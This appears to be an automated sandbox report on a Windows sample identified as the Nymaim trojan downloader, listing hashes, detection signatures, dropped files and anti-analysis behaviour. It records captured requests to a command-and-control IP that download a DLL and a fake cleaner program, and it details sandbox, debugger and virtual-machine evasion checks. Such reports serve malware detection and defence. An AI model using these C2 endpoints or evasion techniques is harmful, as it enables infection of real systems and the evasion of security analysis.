Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565534
MD5: 9d2eed099096486e2ae388b2b220497c
SHA1: c84457bca7db83641fd56925c6496b4c9a8c6c5b
SHA256: 5d5a9d7c44e0dbd125b577319dcad5274121c38b6cde03658eb83c49e316d307
Tags: exeuser-Bitsight

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Nymaim
Description: Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

AV Detection

Source: 1.2.file.exe.400000.0.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe ReversingLabs: Detection: 75%
Source: file.exe ReversingLabs: Detection: 31%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 1_2_004035D0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04933837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 1_2_04933837
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00417727 FindFirstFileExW, 1_2_00417727
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10007EA9 FindFirstFileExW, 1_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0494798E FindFirstFileExW, 1_2_0494798E

Networking

Source: Malware configuration extractor IPs: 185.156.72.65
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
    Date: Sat, 30 Nov 2024 04:35:53 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Disposition: attachment; filename="dll";
    Content-Length: 242176
    Keep-Alive: timeout=5, max=86
    Connection: Keep-Alive
    Content-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
    Date: Sat, 30 Nov 2024 04:35:54 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Disposition: attachment; filename="soft";
    Content-Length: 1502720
    Keep-Alive: timeout=5, max=85
    Connection: Keep-Alive
    Content-Type: application/octet-stream
Source: Joe Sandbox View IP Address: 185.156.72.65
Source: Joe Sandbox View ASN Name: ITDELUXE-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 1_2_00401970
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 185.156.72.65
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 185.156.72.65
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 185.156.72.65
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: C
    Host: 185.156.72.65
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: d
    Host: 185.156.72.65
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: s
    Host: 185.156.72.65
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
Source: file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/download
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/key
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/files/download
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/soft/download
Source: Amcache.hve.14.dr String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.dr String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.dr String found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.dr String found in binary or memory: https://iplogger.org/1Pz8p7

E-Banking Fraud

Source: Yara match File source: 1.2.file.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1309173402.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0493AA07 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040A7A0 appears 35 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 644
Source: file.exe, 00000001.00000003.1734839314.000000000526C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe, 00000001.00000003.1734619327.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Y-Cleaner.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9951234076433121
Source: file.exe Static PE information: Section: olgpsnjw ZLIB complexity 0.99229768222981
Source: classification engine Classification label: mal100.troj.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 1_2_00402A50
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04788464 CreateToolhelp32Snapshot,Module32First, 1_2_04788464
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 1_2_00401970
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4708
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\23RE4w32fN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Command line argument: nosub 1_2_004087E0
Source: C:\Users\user\Desktop\file.exe Command line argument: mixtwo 1_2_004087E0
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe ReversingLabs: Detection: 31%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Cleaner.lnk.1.dr LNK file: ..\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe
Source: file.exe Static file information: File size 1995776 > 1048576
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: Raw size of olgpsnjw is bigger than: 0x100000 < 0x1a5000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;olgpsnjw:EW;sccxqdxh:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.1.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: dll[1].1.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Y-Cleaner.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: soft[1].1.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: file.exe Static PE information: real checksum: 0x1e843a should be: 0x1f6ecf
Source: Bunifu_UI_v1.5.3.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: olgpsnjw
Source: file.exe Static PE information: section name: sccxqdxh
Source: file.exe Static PE information: section name: .taggant
Source: file.exe Static PE information: section name: entropy: 7.942270007630704
Source: file.exe Static PE information: section name: olgpsnjw entropy: 7.949609738056107
Source: Y-Cleaner.exe.1.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].1.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Bunifu_UI_v1.5.3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60C444 second address: 60C448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60F216 second address: 60F21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60F21A second address: 60F220 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612794 second address: 612798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612C7F second address: 612C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612DA9 second address: 612DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6115A8 second address: 6115AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6115AE second address: 6115B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612E98 second address: 612EBA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCBA46BC738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCBA46BC73Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612EBA second address: 612EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B50 second address: 616B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B58 second address: 616B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B5E second address: 616B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC746h 0x00000009 jo 00007FCBA46BC736h 0x0000000f popad 0x00000010 pop edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B85 second address: 616B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616CE5 second address: 616CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616E3B second address: 616E68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCBA4817E89h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jns 00007FCBA4817E76h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616E68 second address: 616E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616FDD second address: 616FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6175A1 second address: 6175AB instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA46BC736h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 618D08 second address: 618D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FCBA4817E76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 618D13 second address: 618D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b js 00007FCBA46BC744h 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FCBA46BC736h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 618D2C second address: 618D42 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 or di, B341h 0x0000000c push 94D92880h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
